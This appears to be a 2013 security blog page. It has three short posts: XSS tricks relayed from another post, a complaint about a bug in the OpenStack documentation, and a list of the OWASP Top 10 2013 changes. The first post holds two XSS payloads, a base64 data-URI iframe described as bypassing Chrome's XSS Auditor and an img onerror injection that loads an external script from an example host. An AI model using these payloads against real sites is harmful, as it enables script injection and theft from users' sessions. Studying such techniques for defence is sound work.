Wednesday, March 13, 2013

A couple of XSS tricks from a good post

This post http://blog.nibblesec.org/2013/03/subverting-cloud-based-infrastructure.html shares a couple of good XSS tricks:

  • Choosing Google Chrome as the target browser required bypassing XSS Auditor, its built-in anti-XSS filter. As discovered by Mario Heiderich, the data URI scheme with base64 content can be leveraged to bypass the filter: 
<html> <body> <iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe> </body> </html>
  • A Chrome extension can override default SOP restrictions and issue cross-domain requests reading the HTTP response, accessing other browser tabs, and also reading every cookie including those marked as HttpOnly.
  • JS injection:
<img/src='a'onerror='document.write("<scr","ipt/type=\"text/JavaScript\"/src=\"","http://www.example.com/onetime.js","\"></script>")'>

Tuesday, March 5, 2013

Documentation

Just wasted an hour trying to figure out why I cannot get the OpenStack console to work. It turned out that the documentation has a bug. 

I found this post 
https://bugs.launchpad.net/openstack-manuals/+bug/979054

A year after the bug was reported, the mistake is still in the documentation: 
http://docs.openstack.org/essex/openstack-compute/admin/content/accessing-vnc-consoles-with-a-java-client.html

Documentation is important! Accurate documentation is more important!!

OWASP Top 10 2013 Release candidate

OWASP Top 10 - 2013 Release Candidate includes the following changes relative to the current 2010 edition:
  • A1 Injection
  • A2 Broken Authentication and Session Management (was formerly A3)
  • A3 Cross-Site Scripting (XSS) (was formerly A2)
  • A4 Insecure Direct Object References
  • A5 Security Misconfiguration (was formerly A6)
  • A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection)
  • A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access)
  • A8 Cross-Site Request Forgery (CSRF) (was formerly A5)
  • A9 Using Known Vulnerable Components (new but was part of former A6 Security Misconfiguration)
  • A10 Unvalidated Redirects and Forwards